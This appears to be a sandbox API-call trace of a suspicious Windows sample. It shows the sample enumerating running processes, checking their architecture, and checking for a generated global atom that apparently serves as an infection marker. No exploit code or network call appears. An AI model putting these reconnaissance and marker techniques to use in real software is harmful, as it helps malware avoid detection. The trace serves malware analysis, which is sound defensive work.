	[0096.940] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.940] CloseHandle (hObject=0x248) returned 1
	[0096.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.940] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.940] CloseHandle (hObject=0x248) returned 1
	[0096.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.940] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.940] CloseHandle (hObject=0x248) returned 1
	[0096.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x6590a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.940] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.941] CloseHandle (hObject=0x248) returned 1
	[0096.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.941] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.941] CloseHandle (hObject=0x248) returned 1
	[0096.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.941] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.941] CloseHandle (hObject=0x248) returned 1
	[0096.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.942] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.943] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.943] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.943] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.944] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetLastError () returned 0x5
	[0096.945] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.946] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.946] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.946] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.946] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.946] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.946] CloseHandle (hObject=0x248) returned 1
	[0096.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.947] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.947] CloseHandle (hObject=0x248) returned 1
	[0096.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ac68, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.947] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.947] CloseHandle (hObject=0x248) returned 1
	[0096.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x166d8) returned 0xc0000004
	[0096.987] VirtualAlloc (lpAddress=0x0, dwSize=0x167d8, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x167d8, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65adf8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.993] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.993] CloseHandle (hObject=0x248) returned 1
	[0096.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.994] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.994] CloseHandle (hObject=0x248) returned 1
	[0096.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.994] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.994] CloseHandle (hObject=0x248) returned 1
	[0096.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.995] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.995] CloseHandle (hObject=0x248) returned 1
	[0096.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.995] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.995] CloseHandle (hObject=0x248) returned 1
	[0096.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fea8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.996] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.996] CloseHandle (hObject=0x248) returned 1
	[0096.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658f08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.996] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.996] CloseHandle (hObject=0x248) returned 1
	[0096.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.996] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.996] CloseHandle (hObject=0x248) returned 1
	[0096.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.997] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.997] CloseHandle (hObject=0x248) returned 1
	[0096.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.997] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.997] CloseHandle (hObject=0x248) returned 1
